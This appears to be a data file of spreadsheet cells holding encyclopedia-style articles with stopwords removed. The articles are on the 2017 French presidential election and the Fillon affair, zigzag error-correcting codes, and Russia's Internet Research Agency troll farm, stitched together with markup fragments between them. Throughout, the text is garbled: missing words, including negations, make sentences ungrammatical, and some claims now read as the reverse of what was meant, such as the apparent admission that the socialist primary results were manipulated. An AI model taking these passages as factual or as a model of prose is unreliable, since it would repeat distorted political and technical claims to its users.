demanded transparency funding places worship, civic training imams, and, unlike sarkozy, favored allowing women wear muslim headscarf universities. economic issues, proposed 35-hour workweek, abolish wealth tax, reduce corporate taxation, retirement also pledged slash half number parliamentarians, renegotiate schengen, increase defense spending absolute terms least billion 2022.after several strong debate performances fillon, however, second-round juppé–sarkozy duel longer appeared inevitable. fillon's rise propelled proposals rigorous economic program. seeking €100 billion cuts, proposed eliminating 500,000 civil service jobs 2022 return 39-hour workweek civil servants. like primary candidates, planned eliminate wealth tax; addition, fillon suggested abolishing 35-hour workweek capping 48-hour maximum allowed within implementation liberal economic measures. also adopted staunchly conservative social program, opposing adoption same-sex couples arguing france religious problem apart islam itself. like sarkozy, sought expand capacity french prisons, unlike former superior, opposed banning religious symbols public places. also professed pro-russian stance candidates, urging cooperation syria islamic state supporting "pragmatism" vladimir putin's intervention syrian civil war.the first round primary november unexpected elimination sarkozy, fillon coming first 44.1%, juppé 28.6%, sarkozy 20.7% vote, candidates behind. second round fillon juppé confirmed, sarkozy announced would vote former prime minister soon results became clear. fillon scored landslide victory november runoff 66.5% vote juppé's 33.5% became republicans' nominee; voter turnout million even higher first round. socialist party (ps) 2012 toulouse congress, socialist party (ps) modified statutes guarantee selection candidate left open primaries, national council socialist party announcing timetable organization primaries least year beforehand. january, libération published editorial favor "primary left ecologists", april national council socialist party unanimously approved idea holding primary early december. june, national council finally confirmed would organize primary select candidate 2017 presidential election. applications could submitted december, rounds voting planned january 2017. prospective candidates required sign primary's charter ethics requiring candidates rally behind winner secure support following groups: members national council; socialist parliamentarians, regional departmental socialist councilors least regions departments; socialist mayors representing 10,000 people least regions departments. conditions becoming candidate member parties prg, ude, democratic front (fd) determined respective parties' leadership.the eelv declared june would participate primary, french communist party (pcf) likewise following day. after declaring candidacy presidential election, emmanuel macron marche! also declined participate, jean-luc mélenchon banner france insoumise, saying want primary françois hollande since would able support hollande won. later reaffirmed saying exclusion eelv primary truly left" "primary socialist party". december, hollande declared would seek second term, becoming first president fifth republic renounce reelection bid. announcement reflected high personal unpopularity resentment among socialist colleagues regarding remarks made cabinet members associates book président devrait dire ça... president that...) gérard davet fabrice lhomme, journalists monde. december, high authority declared seven candidates qualified appear ballot: four socialist party former prime minister manuel valls, arnaud montebourg, benoît hamon, vincent peillon françois rugy sylvia pinel prg, jean-luc bennahmias early opinion polling placed valls montebourg first second, respectively, hamon close third. shortly declaring candidacy december, valls proposed abolish article 49.3 french constitution, procedure allows bypassing legislative approval, "democratic renaissance"; prime minister, invoked occasions, using pass macron khomri laws. also proposed 2.5% increase public spending keeping budget deficit guaranteeing "decent income" €800, reducing gender half, pausing enlargement european union, appending charter secularism constitution, consolidating nuclear industry, mandating months civic service. twice physically attacked primary campaign: december, flour-bombed protester strasbourg saying forget [the 49.3]!", january, slapped young breton regionalist lamballe, subsequently charged.former minister economy arnaud montebourg, socialist rebel known promoting "made france", presented firmly left-wing project shortly declaring candidacy august 2016. promised offer french enterprises preference bidding, reverse 2011 increases french middle class, repeal khomri labor preserving certain "interesting" social protections "right disconnect" "personal activity account". critical european austerity, declared would defy requirement maintain budget deficit intended strengthen intelligence services, require months civic service, achieve gender equality. also proposed billion spending stimulate economic growth, lower general social contribution (csg) increase individuals' purchasing power €800 year, create 5,000 posts hospitals, call referendum republic, promulgate separation banking activities hollande did), impose european carbon tax, establish national anti-terrorism prosecutor.the signature proposal benoît hamon implementation universal basic income french citizens, rolled stages beginning 2018, partially funded levied property combining existing property (taxe foncière) solidarity wealth (isf), addition robots fund social protections general. like fellow socialist dissidents, hamon criticized khomri labor promised repeal elected, suggested replaced legislation acknowledging need greater social protections, including right disconnect recognizing burnout occupational disease. also proposed reduce 35-hour workweek hours, saying time "myth" economic growth. another flagship proposals legalize cannabis, using funds "prevention" rather "repression". first round primary january, hamon valls received 36.03% 31.48%, respectively, advanced runoff january. montebourg, secured 17.52% votes, declared would cast second-round vote hamon soon result became apparent. among remaining candidates, peillon secured 6.81% vote, rugy 3.83%, pinel 2.00%, bennahmias 1.02%. overall turnout stood 1.66 million. legitimacy first-round results published organizers primary questioned observers french press, noted overnight update added 352,013 votes without significantly changing candidate's percentage, vote totals candidate increasing 28%. christophe borgel, president organizing committee primary, claimed anomaly nothing "bug" induced pressure update level participation first round, effectively acknowledging results primary manipulated. only january high authority primary publish "validated" results. second round primary january, hamon defeated valls comfortable margin, 58.69% 41.31%; turnout, 2.05 million, considerably higher first round. winner primary, hamon became socialist nominee president.on february, françois rugy announced support emmanuel macron, breaking commitment requested former candidates back winner primary. while acknowledging hamon legitimate nominee, rugy said preferred "coherence obedience". march, parisien reported valls, rather backing hamon, would urge voters support macron first round presidential election; valls denied report time, march declared would vote macron would rally behind candidacy. april high authority reminded party members abide "principle loyalty". march, announced support hamon, securing concessions issues pertaining european governance, confirmed agreement socialist party legislative elections; followed period hesitation primary party contemplated macron's candidacy, secured several parliamentarians' support. fillon affair (penelopegate) january 2017, satirical weekly canard enchaîné first alleged françois fillon employed wife penelope parliamentary assistant 1998 2002 months 2012, evidence completed substantial work. collected monthly salary €3,900 €4,600. after husband's appointment minister social affairs 2002 later tenure minister national education, went serve 2007 parliamentary aide marc joulaud, fillon's substitute, earning increased salary upwards €7,900 still evidence substantial work. article claimed received total €500,000 parliamentary aide, well €100,000 literary adviser revue deux mondes. owner, billionaire marc ladreit lacharrière, close friend françois fillon. while deputies national assembly employ family members, still required complete legitimate work, evidence paper unable find. based information day, (parquet national financier, national financial prosecutor's office) initiated preliminary investigation possible embezzlement misuse public funds.on january, françois fillon appeared respond allegations, stating wife "edited speeches" "stood events couldn’t there", also claiming reason never seen working palais bourbon "she never front line". interview, disclosed also paid children senator sarthe 2005 2007, claiming employed capacity lawyers. also pledged resign would personally placed investigation. however, january, revealed marie charles fillon students father employed stint senate, contrary statements previous day. interrogated investigators day, former editor-in-chief revue deux mondes michel crépu claimed "two maybe three" bylines review attributed her, also saying seen trace" work would "resemble [that literary adviser". february, week initial report, canard enchaîné published revelations total received penelope fillon fictitious jobs apparently totaled €930,000; addition period 1988 1990, income parliamentary assistant totaled €831,440. addition, satirical weekly also revealed payments fillon's children reached nearly €84,000, €57,084 marie fillon €26,651 charles fillon. video excerpts 2007 sunday telegraph interview penelope fillon surfaced february, claimed "never assistant", referring husband; footage aired envoyé spécial france evening. expanded investigation fictitious employment affair include fillon's eldest children verify veracity work, canard enchaîné reported neither marie charles fillon lawyers time father served senate. video february, françois fillon insisted would maintain candidacy called supporters "hold line", seeking assuage worries within camp maintenance candidacy.on february, fillon held press conference "apologized french people" acknowledged committed "error" employing family members parliamentary assistants, appended "never broke law". also argued wife's "salary perfectly justified", adding everything reported press issue "legal transparent". said would reimburse payments received wife children, and, saying "nothing hide", divulged property holdings. addition promising lawyers would question competency carry investigation, lambasted "media lynching" campaign. remarks followed juppé's declaration means earlier response rumors might replace fillon party's candidate decide drop bid. canard enchaîné continued stories fillon issue february, revealing penelope fillon collected severance payments totaling €45,000, €16,000 august 2002 period 1998–2002 €29,000 2013 seventeen months employment earned €65,839. satirical weekly also asserted received double salary summer 2002, hired joulaud's office july, month contract parliamentary assistant husband expired, august. although aides eligible collect severance payments, permit high level parliamentary assistants. article issue reported marie fillon simultaneously employed parliamentary assistant training become lawyer, taking first post october 2005 entering january 2006. fillon responded claims press release saying canard enchaîné conflated amount wife collected november 2013 reported earnings august 2007 conclusion work joulaud, denounced paper's allegations "lies".on february, fillon seemingly withdrew earlier promise would terminate candidacy placed formal investigation, saying "even investigation, nothing stop private. interview figaro published february, insisted continuing campaign, declaring candidate continue victory" closer election was, "more scandalous would deprive right centre candidate". february finally opened judicial investigation "embezzlement public funds, [...] influence-peddling failure comply transparency obligations hatvp" françois fillon, wife, children, marc joulaud (who left unnamed, presumably, allow expanding investigation suspects, necessary). oclciff, failed unearth tangible proof work fillon's wife parliamentary assistant husband 1988 1990, 1998 2000, 2012 2013 marc joulaud 2002 2007, unconvinced reviews revue deux mondes attributed penelope fillon, tasked three investigative judges continue pursuing affair. these three judges identified february serge tournaire, stéphanie tacheau, aude buresi.on march, fillon informed summoned appear judges likely placed formal investigation generally precursor eventual indictment march. subsequent hours days, hundreds campaign members, allies, supporters rescinded support fillon, including union democrats independents (udi), centre-right party whose president jean-christophe lagarde backed juppé primary, suspended participation campaign. fifteen campaign staffers, hundreds others; total elected officials members fillon campaign withdrew support candidate march. many rescinding support speculated potential return juppé replace fillon party's candidate, fenech urging elected officials file sponsorships ex-primary candidate. meanwhile, associates juppé indicated apparently warming idea stepping needed, "ready loyal". despite chain defections, françois fillon remained defiant, holding rally trocadéro afternoon intended show force. appeared heures france evening, refused give candidacy, saying "there alternative" adding today stop candidate", insisting party decide" fate candidacy. said rally trocadéro cemented legitimacy, though would stepped months indicted then, close presidential election would unfair voters right quit now. with "political committee" planned following day, proposed assemble modified campaign team, naming françois baroin, éric ciotti, chatel, attempt rally support around candidacy. immediately fillon's appearance, juppé announced twitter give statement press bordeaux 10:30 after.juppé officially announced abstention race march, saying "for late", added fillon "dead end" allegations political assassination. day, party's "political committee" rallied behind fillon, unanimously reaffirming support candidacy. day, canard enchaîné revealed fillon failed declare hatvp €50,000 loan marc ladreit lacharrière, president revue deux mondes. renewed support fillon evening, albeit conditionally. march, parisien revealed investigators discovered suspicious wire transfers made marie charles fillon father employed him, marie returning €33,000 €46,000 paid. charles fillon, hearing, referred similar transfers parents' joint account, worth salary.on morning march, fillon placed formal investigation misuse public funds, embezzlement, failure comply hatvp disclosure requirements. march investigation fillon extended "aggravated fraud, forgery, falsification records". particular, probe sought determine whether documents seized search national assembly march forged order corroborate veracity penelope fillon's work parliamentary assistant. investigation also expanded possible influence-peddling related fillon's consulting firm conseil, previously hired billionaire marc ladreit lacharrière, owner revue deux mondes, employed penelope fillon. 2013 lacharrière also provided €50,000 loan françois fillon, failed declare legally required. l'émission politique march, fillon said bienvenue place beauvau, book co-authored didier hassoux canard enchaîné, suggested president hollande shadow cabinet spread rumours opponents, claim hassoux subsequently denied. march, marc joulaud, fillon's former substitute, formally placed investigation embezzlement public funds. penelope fillon placed formal investigation complicity concealment embezzlement misuse public funds, well aggravated fraud, march.on april, mediapart revealed penelope fillon fact paid national assembly starting 1982, 1986, earlier claimed françois fillon. edition canard enchaîné publication april revealed françois fillon secured then-fiancée three times minimum wage parisian ministry early 1980 serving deputy chief staff minister defence joël theule; contract ended 1981, months, socialists swept power. other incidents after securing party's nomination presidential primary january 2017, socialist party (ps) dissident benoît hamon proposed forming "governmental majority" jean-luc mélenchon france insoumise (fi) yannick jadot europe ecology greens (eelv), seeking "reconcile left environmentalists". though mélenchon earlier demonstrated hostility possibility alliance, expressed "satisfaction" hamon's sentiments shortly primary. february, jadot cemented agreement withdraw candidacy favor hamon, february hamon acknowledged talks secure alliance mélenchon failed, pair agreeing code mutual respect. talks failed part candidates' differing positions matters related european union (eu), european central bank (ecb), treaties, european defense, obligation maintain budget deficit gdp, among divergences.during trip algeria february, emmanuel macron, candidate marche!, remarked interview local press french presence country "crime humanity" "truly barbaric", drawing numerous right-wing french politicians. françois fillon republicans denounced macron's remarks "hatred history, constant repentance unworthy candidate presidency republic". seeking aside controversy meeting toulon february, attempted qualify remarks, saying "sorry" "hurt" "offended" many result, nevertheless continued insist acknowledging france responsibility colonial past, algeria. remarks followed temporary resurgence fillon polls voting intentions. various investigations fictitious employment parliamentary assistants national front (fn) meps, implicating entourage marine pen, continued 2017. these fictitious jobs would constitute €7.5 million losses european taxpayers period 2010 2016. european anti-fraud office (olaf) pursued case, establishing pen's parliamentary assistants, catherine griset, never secured lease brussels five years employed rarely appeared european parliament, another, thierry légier, worked bodyguard time. though european parliament demanded return €298,392 january 2018, representing salary "unduly paid" griset, refused european parliament began reduce salary reclaim money. february, investigators raided fn's headquarters nanterre second time connection case; though summoned appear judges february griset case, refused june legislative elections, invoking parliamentary immunity granted mep. march, summoned appear judges potentially charged breach confidence, absent, affirming would respond case campaign. march, charles hourcade, served parliamentary assistant marie-christine boutonnet, faced charges "concealment breach confidence" separate case; like pen, described investigations fn's fictitious employment parliamentary assistants "political operation", boutonnet declined appear judges.on april, three days first round, three police officers shot killed attack champs-élysées, interrupting minutes pour convaincre minutes convince) france program featuring successive interviews candidates; following interviews, remaining candidates paid tribute victims attack. wake attack, fillon, suspended campaign activities following final campaigning macron canceled trips mélenchon insisted maintaining schedule demonstrate would allow violence interrupt democratic process; hamon made similar remarks, proceeding campaign event following day.a report published april japan-based security firm trend micro alleged group hackers targeting macron campaign. group, known "pawn storm" (better known apt28 "fancy bear"), believed linked russian state, responsible previous attacks, including tv5monde april bundestag 2015. particular, group attempted phishing operation, registering four domains strongly resembling actually used marche!, three domiciled ukraine france.in interview associated press head french government's cyber security agency, investigated leaks president emmanuel macron's election campaign, said find trace notorious russian hacking group behind attack. first round official campaign began april ended midnight april. during period, conseil supérieur l'audiovisuel ensure equal speaking time candidates audiovisual media. french public broadcasters, slots allotted eleven candidates april, nine slots april eleven slots candidate april, final active campaigning.voting first round took place saturday april 08:00 19:00 (local time) french overseas departments territories situated east international date line west metropolitan france (i.e. french guiana, french polynesia, guadeloupe, martinique, saint martin, saint barthélemy saint pierre miquelon), well french diplomatic missions americas. although overseas voting took place metropolitan france, election results final turnout figures announced time, starting 20:00 (paris time) april, voting ended metropolitan france. voting metropolitan france well french overseas departments territories mayotte, caledonia, réunion wallis futuna, french diplomatic missions outside americas) took place april 08:00 19:00 20:00 (local time).the official election results declared constitutional council april, macron advancing second round. debates debate françois fillon, benoît hamon, marine pen, emmanuel macron, jean-luc</t>
  </si>
  <si>
    <t>Zigzag code</t>
  </si>
  <si>
    <t>coding theory, zigzag code type linear error-correcting code introduced ping, huang phamdo (2001). they defined partitioning input data segments fixed size, adding sequence check bits data, check exclusive bits single segment previous check sequence. code rate high: j/(j number bits segment. worst-case ability correct transmission errors limited: worst case detect single error cannot correct errors. however, works better soft-decision model decoding: regular structure allows task finding maximum-likelihood decoding posteriori probability decoding performed constant time input bit. references</t>
  </si>
  <si>
    <t>Internet Research Agency</t>
  </si>
  <si>
    <t>internet research agency (ira; russian: агентство интернет-исследований, romanized: agentstvo internet-issledovaniy), also known glavset (russian: главсеть) known russian internet slang trolls olgino (russian: ольгинские тролли), russian company engaged online propaganda influence operations behalf russian business political interests. linked russian oligarch yevgeny prigozhin based saint petersburg, russia. january 2017 report issued united states intelligence community assessing russian activities intentions recent elections described agency troll farm: "the likely financier so-called internet research agency professional trolls located saint petersburg close ally [vladimir] putin ties russian intelligence," commenting "they previously devoted supporting russian actions ukraine—[and] started advocate president-elect trump early december 2015." agency employed fake accounts registered major social networking sites, discussion boards, online newspaper sites, video hosting services promote kremlin's interests domestic foreign policy including ukraine middle east well attempting influence 2016 united states presidential election. more 1,000 employees reportedly worked single building agency 2015. extent agency tried influence public opinion using social media became better known june 2014 buzzfeed news article greatly expanded government documents published hackers earlier year. internet research agency gained attention june 2015, offices reported data fake accounts used biased internet trolling. subsequently, news reports individuals receiving monetary compensation performing tasks.on february 2018, united states grand jury indicted russian nationals three russian entities, including internet research agency, charges violating criminal laws intent interfere "with u.s. elections political processes", according justice department. july 2020, president trump revealed approved cyberattack organization 2018 disrupted shut operations. origin company founded mid-2013. 2013, novaya gazeta newspaper reported internet research agency ltd's office olgino, historic district saint petersburg.the terms "trolls olgino" "olgino's trolls" (russian: "тролли ольгино", "ольгинские тролли") become general terms denoting trolls spread pro-russian propaganda, necessarily based office olgino. organizers strategic russian newspaper vedomosti links approved-by-russian-authorities strategy public consciousness manipulation media vyacheslav volodin, first deputy vladimir putin presidential administration russia. tactical journalists written alexey soskovets, participated russian youth political community, directly connected office olgino, company, north-western service agency, (according different sources) contracts organizing celebrations, forums sport competitions authorities saint petersburg soskovets' company participant half bids. mid-2013 agency tender providing freight services participants seliger camp.in 2014, according russian media, internet research ltd. (russian: «интернет исследования») founded march 2014, joined ira's activity. newspaper novaya gazeta reported company successor internet research agency ltd. internet research ltd. considered linked yevgeny prigozhin, head holding company concord management consulting. "trolls olgino" considered project. october 2014, company belonged mikhail bystrov, head police station moscow district saint petersburg.russian media point according documents, published hackers anonymous international, concord management directly involved trolling administration agency. researchers cite e-mail correspondence, concord management gives instructions trolls receives reports accomplished work. according journalists, concord management organized banquets kremlin also cooperated voentorg russian ministry defence.despite links alexei soskovets, nadejda orlova, deputy head committee youth policy saint petersburg, disputed connection institution trolling offices.finnish journalist jessikka aro, reported extensively pro-russian trolling activities finland, targeted organized campaign hate, disinformation harassment. offices saint petersburg 2013: primorskoye shosse, olgino, saint petersburg 59°59′42.7″n 30°07′49.7″e reported novaya gazeta, august 2013, following message appeared social networks: "internet operators wanted! chic office olgino!!! (st. staraya derevnia), salary 25960 month (usd$780 2013). task: posting comments profile sites internet, writing thematic posts, blogs, social networks. reports screenshots. individual schedule [...] payment every week, 1180 shift (from 8.00 16.00, 10.30 18.30, 14.00 22.00). payments every week free meals!!! official placement according contract will). tuition possible."as reported media former employees, office olgino, primorskiy district, peterburg existed functioning since september 2013. situated white cottage, minutes underground railway staraya derevnia station, opposite olgino railway station. workplaces troll-employees placed basement rooms. 2014: ulitsa savushkina (street), saint petersburg 59°59′03.5″n 30°16′19.1″e according russian online newspaper dp.ru, several months october 2014 office moved olgino four-story building savushkina street, primorskiy district, peterburg. reported journalists, building officially uncompleted construction stayed march 2015.a york times investigative reporter told internet research agency shortened name "internet research," june 2015 asked leave savushkina street location couple months ago" giving entire building reputation." possibly related organization, federal news agency, located building. york times article describes various experiences reported former employees internet research agency savushkina street location. also describes several disruptive hoaxes europe, columbian chemicals plant explosion hoax, attributable internet research agency similar russian-based organizations. february 2018: optikov street, building lakhta-2 business center, lakhta, saint petersburg 59°59′41.5068″n 30°14′44.4588″e reported russian online newspaper dp.ru december 2017, office moved four-story building savushkina street lakhta four floors optikov street, building (russian: санкт-петербург: улица оптикова, корпус near staroderevenskaya street (russian: стародеревенская улица) lakhta-2 business center (russian: «лахта-2») february 2018. beginning february 2018, also known "lakhta trolls" (russian: лахта тролли). other cities novaya gazeta reported that, according alexey soskovets, head office olgino, north-western service agency hiring employees similar projects moscow cities 2013. work organization more 1,000 paid bloggers commenters reportedly worked single building savushkina street 2015. many employees work remotely. according buzzfeed news, people generally employed trolls' office earlier, june 2014. each commentator daily quota comments.trolls take shifts writing mainly blogs livejournal vkontakte, subjects along propaganda lines assigned. included among employees artists draw political cartoons. they work hours every days. blogger's quota posts shift, post least characters. commenter's norm comments posts account. each blogger charge three accounts.employees olgino office earned 25,000 russian rubles month; savushkina street office earned approximately 40,000 russian rubles. 2014, fontanka.ru described schemes plundering federal budget, intended toward trolling organization. 2017 another whistleblower said bonuses long working hours salary reach 80,000 rubles. employee interviewed washington post described work: immediately felt like character book 1984 george orwell place write white black black white. your first feeling, ended there, kind factory turned lying, telling untruths, industrial assembly line. according 2018 kommersant article, yaroslov ignatovsky (russian: ярослав ринатович игнатовский; born 1983, leningrad) heads politgen (russian: "политген") political strategist coordinated trolls' efforts prigozhin. trolling themes according testimonies investigative journalists former employees offices, main topics posts included: criticism alexei navalny, sponsors, russian opposition general; criticism ukraine's united states' foreign policies, politicians states; praise vladimir putin policy russian federation; praise defense bashar al-assad.the also leveraged trolls erode trust american political media institutions showcase certain politicians incompetent. journalists written themes trolling consistent russian propaganda outlets topics timing. technical points used trolls taken mainly content disseminated (formerly russia today).a 2015 news investigation identified olgino factory likely producer september 2015 "saiga 410k review" video actor posing u.s. soldier shoots book turns quran, sparked outrage. news found among irregularities soldier's uniform used u.s. military easily purchased russia, actor filmed likely bartender saint petersburg related troll factory employee.the citizen-journalism site bellingcat identified team olgino real authors video attributed azov battalion masked soldiers threaten netherlands organizing referendum ukraine–european union association agreement. organized anti-ukrainian campaign beginning april 2014 began organized online campaign shift public opinion western world would useful russian authorities regarding russian military intervention ukraine 2014. hacked leaked documents time contain instructions commenters posting websites news, huffington post, theblaze, politico, worldnetdaily. requirement working hours trolls also mentioned: comments news articles day. each blogger manage accounts facebook, post least three posts every day, participate twice group discussions. other employees manage accounts twitter, publishing tweets every day. journalists concluded igor osadchiy probable leader project, campaign internet research agency ltd. osadchiy denied connection agency.the company also main sponsors anti-western exhibition material evidence.in beginning 2016, ukraine's state-owned news agency ukrinform claimed expose system bots social networks, called violence ukrainian government starting "the third maidan". they reported organizer system former anti-ukrainian combatant sergiy zhuk donbass. allegedly performed internet activity vnukovo district moscow. reactions foreign march 2014, polish edition newsweek expressed suspicion russia employing people "bombard" website pro-russian comments ukraine-related articles. poland's governmental computer emergency response team later confirmed pro-russia commentary flooded polish internet portals start ukrainian crisis. german-language media websites also flooded pro-russia comments spring 2014.in late 2014, hacker group anonymous international began publishing documents received hacked emails internet research agency managers.in may–june 2014, internet trolls invaded news media sites massively posted pro-russian comments broken english.in march 2015 service enabling censorship sources anti-ukrainian propaganda social networks inside ukraine launched.the united states justice department announced indictment february 2018, internet research agency also naming dozen individual suspects allegedly worked part special counsel's investigation criminal interference 2016 election. assessments according 2019 report oxford researchers including sociologist philip howard, social media played major role political polarization united states, computational propaganda "the automation, algorithms, big-data analytics manipulate public life"—such spread fake news conspiracy theories. researchers highlighted role russian internet research agency attempts undermine democracy exacerbate existing political divisions. prominent methods misinformation "organic posting, advertisements", influence operation activity increased 2016 limited 2016 election. examples efforts included "campaigning african american voters boycott elections follow wrong voting procedures 2016", "encouraging extreme right-wing voters confrontational", "spreading sensationalist, conspiratorial, forms junk political news misinformation voters across political spectrum."russian bloggers anton nosik, rustem adagamov, dmitriy aleshkovskiy said paid internet-trolls change public opinion. their usage steal budget money. political scientist thomas said least effective russia's interference campaigns 2016 u.s. election, despite outsized press coverage, made measurable impact american voters.leonid volkov, politician working alexei navalny's anti-corruption foundation, suggests point sponsoring paid internet trolling make internet distasteful ordinary people willing participate. columbian chemicals plant explosion hoax september 2014, work internet research agency. additional activities organizers based documents published anonymous international, concord management consulting linked funding several media outlets ukraine russia, including kharkiv news agency, news neva, newspaper about newspapers, business dialog, journalist truth.the columbian chemicals plant explosion hoax september 2014, claim explosion chemical plant centerville, mary parish, louisiana, attributed june 2015, york times magazine, highly coordinated disinformation campaign" "virtual assault" work internet research agency.three months later, accounts posted false messages twitter ebola outbreak atlanta keyword #ebolainatlanta, quickly relayed picked users living city. video posted youtube, showing medical team treating alleged ebola victim atlanta airport. day, different group launched rumor twitter keyword #shockingmurderinatlanta, reporting death disarmed black woman shot police. again, blurry poorly filmed video broadcast support rumor.between july 2014 september 2017, used bots trolls twitter discord safety vaccines. campaign used sophisticated twitter bots amplify highly polarizing pro-vaccine anti-vaccine messages containing hashtag #vaccinateus. november 2017, guardian cited university edinburgh study found hundreds accounts also trying influence politics tweeting brexit.in september 2017 facebook said "geographically targeted". facebook revealed 2016 united states presidential election, purchased advertisements website us$100,000, geographically targeted u.s. facebook's chief security officer said "appeared focus amplifying divisive social political messages across ideological spectrum". reviewing buys, found approximately $100,000 spending june 2015 2017 associated roughly 3,000 connected inauthentic accounts pages violation policies. analysis suggests accounts pages affiliated another likely operated russia. according october 2017 buzzfeed news report, duped american activists taking real action protests self-defense training would seem attempt exploit racial grievances.on february 2018, internet research agency, along russian individuals russian organizations, indicted following investigation special counsel robert mueller charges stemming "impairing, obstructing, defeating lawful functions government."on march 2018, daily beast revealed details gathered leaked internal documents, showed used reddit tumblr part influence campaign. day, tumblr announced banned accounts linked ira, saying spread misinformation conventional postings rather advertisements.in october 2018 justice department filed charges russian accountant elena khusyaynova working influence 2016 elections also upcoming 2018 midterm elections. rallies protests organized united states april 2016, rally buffalo, york, protested death india cummings, black woman recently died police custody. ira's "blacktivist" facebook account actively promoted event reached directly local activists facebook messenger asking circulate petitions print. "blacktivist" supplied petitions poster artwork.on april 2016, rally protesting death freddie gray attracted large crowds baltimore. ira's "blacktivist" facebook group promoted organized event, including reaching local activists.on april 2016, small group white-power demonstrators held rally called "rock stone mountain" stone mountain park near stone mountain, georgia. they confronted large group anti-racist counterprotestors, violent clashes ensued. protest heavily promoted accounts tumblr, twitter, facebook, website blackmatters.com. used blacktivist facebook account reach out, avail, activist academic barbara williams emerson, daughter hosea williams, help promote protests. afterward, blamed anti-racists violence promoted videos shot event.on 2016, second rally held buffalo, york, protesting death india cummings. like april rally, event heavily promoted ira's "blacktivist" facebook account, including attempted outreach local activists.on 2016, competing rallies held houston alternately protest defend recently opened library islamic knowledge islamic da'wah center. "stop islamization texas" rally organized facebook group "heart texas". posting event encouraged participants bring guns. spokesman group conversed houston press email declined give name. rally, "save islamic knowledge", organized another facebook group called "united muslims america" time location. both facebook groups later revealed accounts.on 2016, westboro baptist church held annual protest lawrence high school graduation ceremonies lawrence, kansas. "lgbt united" facebook group organized counter protest confront westboro baptist church protest, including placing facebook contacting local people. about dozen counter showed lawrence high school students participate counter protest skeptical counter protest organizers. "lgbt united" account appears created specifically event."lgbt united" organized candlelight vigil june 2016, pulse nightclub shooting victims orlando, florida. ira's "don't shoot" facebook group affiliated "don't shoot website tried organize protest outside paul, minnesota police headquarters july 2016, response july fatal police shooting philando castile. some local activists became suspicious motives behind event paul police involved shooting. castille shot anthony police officer nearby falcon heights. local activists contacted "don't shoot." after pressed supported them, "don't shoot" agreed move protest anthony police headquarters. concerned local activists investigated urged participate deciding "don't shoot" "total troll job." "don't shoot" organizers eventually relinquished control event local organizers, subsequently declined accept money offered "don't shoot" cover expenses.a black lives matter protest rally held dallas july 2016. "blue lives matter" counter protest held across street. "blue lives matter" protest organized "heart texas" facebook group controlled ira.the blacktivist facebook group organized rally chicago honor sandra bland july 2016, first anniversary death. rally held front chicago police department's homan square facility. they passed around petitions calling civilian police accountability council ordinance.17 "florida goes trump" rallies held across florida august 2016. rallies organized using "being patriotic" facebook group "march_for_trump" twitter account.the "securedborders" facebook group organized "citizens refugees" protest rally august 2016, city council chambers twin falls, idaho. only small number people showed three-hour event, likely saturday chambers closed. "secureborders" account.the "safe space muslim neighborhood" rally held outside white house september 2016. least people attended event organized ira's "united muslims america" facebook group."blackmattersus", website, recruited activists participate protests days immediately following september 2016, police shooting keith lamont scott charlotte, north carolina. paid expenses microphones speakers.the "miners trump" rallies held pennsylvania october 2016, organized ira's "being patriotic" facebook group.the popular facebook october 2016. ira's back badge facebook group showed badge words "back badge" front police lights caption "community people support brave police officers."a large rally held charlotte, north carolina, october 2016, protesting police shooting keith lamont scott. blackmattersus recruited unwitting local activists organize rally. blackmattersus provided activist bank card rally expenses.anti-hillary clinton "texit" rallies held across texas november 2016. "heart texas" facebook group organized rallies around theme texas seceding united states hillary clinton elected. group contacted texas nationalist movement, secessionist organization, help organizing efforts, declined help. small rallies held dallas, fort worth, austin, cities. attended lubbock rally.a trump protest called "trump president" attracted 5,000 10,000 manhattan november 2016. marched union square trump tower. protest organized blackmattersus.the ira's "united muslims america" facebook group organized "make peace, war!" protest june 2017, outside trump tower york city. unclear whether anyone attended protest instead attended "march truth" affiliated protest held day. lawsuit 2015, trolling company employee lyudmila savchuk saint petersburg sued employer labor violations, seeking disclose activities. ivan pavlov human rights defending initiative team represented savchuk, defendant "troll-factory" agreed savchuk withheld salaries restore job.savchuk later described extreme psychological pressure work place, jokes circulating among employees "one remain sane factory months maximum", result constant switching different personalities workers expected design maintain work time. realization invent fact, watch absolutely synchronized media outlets massive information outflow spread worldwide absolutely breaks psyche indictments february 2018, individuals indicted washington, d.c. grand jury alleged illegal interference 2016 presidential elections, strongly supported candidacy donald trump, according special counsel robert mueller's office. ira, concord management concord catering also indicted. alleged controlled yevgeny prigozhin, wealthy associate russian president vladimir putin.the indicted individuals dzheykhun nasimi ogly aslanov, anna vladislavovna bogacheva, maria anatolyevna bovda, robert sergeyevich bovda, mikhail leonidovich burchik, mikhail ivanovich bystrov, irina viktorovna kaverzina, aleksandra yuryevna krylova, vadim vladimirovich podkopaev, sergey pavlovich polozov, yevgeny viktorovich prigozhin, gleb igorevitch vasilchenko, vladimir venkov. defendants charged conspiracy defraud united states, charged conspiracy commit wire fraud bank fraud, defendants charged aggravated identity theft. none defendants custody.on march, president trump imposed financial sanctions countering america's adversaries through sanctions russian organizations indicted mueller, preventing entering united states answer charges wish october 2018 russian accountant elena khusyaynova charged interferеnce 2016 2018 elections. alleged working ira. said managed million budget. timeline internet research agency interference united states elections 2014 april: creates department called "translator project". department's focus interfering u.s. election. may: begins election interference campaign "spread[ing] distrust towards candidates political system general." 4–26 june: aleksandra krylova anna bogacheva, employees, travel u.s. collect intelligence. maria bovda, third employee, denied visa. three indicted february 2018 work election interference. september: spreads hoax created fictitious chemical plant fire centerville, mary parish, louisiana, purportedly started isis. hoax includes tweets youtube videos showing chemical plant fire. centerville home many chemical plants, plant named tweets exist. initial tweets sent directly politicians, journalists, centerville residents. september october: material evidence exhibition displayed beam gallery chelsea neighborhood york city. portrays conflicts syria ukraine pro-russian light. promoted twitter accounts also spread september chemical plant fire hoax. exhibition partly funded ira. december: uses twitter spread hoax ebola outbreak atlanta. many twitter accounts used september chemical plant fire hoax also spread hoax. hoax includes youtube video medical workers wearing hazmat suits. using different twitter accounts, spreads hoax purported police shooting unarmed black woman atlanta. hoax includes blurry video purported event. 2015 july onward: thousands fake twitter accounts begin praise trump political opponents wide margin, according later analysis wall street journal. november:the instagram account "stand freedom" attempts organize confederate rally houston, texas, november. unclear anyone showed mueller report identifies ira's first attempt organize u.s. rally.: november: creates @ten_gop twitter account. purporting "unofficial twitter account tennessee republicans," peaks 100,000 followers. 2016 february: instructs workers "use opportunity criticize hillary rest (except sanders trump—we support them)." april: starts buying online social media sites. support trump attack clinton. april: rally held buffalo, york, protesting death india cummings. cummings black woman recently died police custody. ira's "blacktivist" account facebook actively promotes event, reaching directly local activists facebook messenger asking circulate petitions print posters event. blacktivist supplies petitions poster artwork. april: 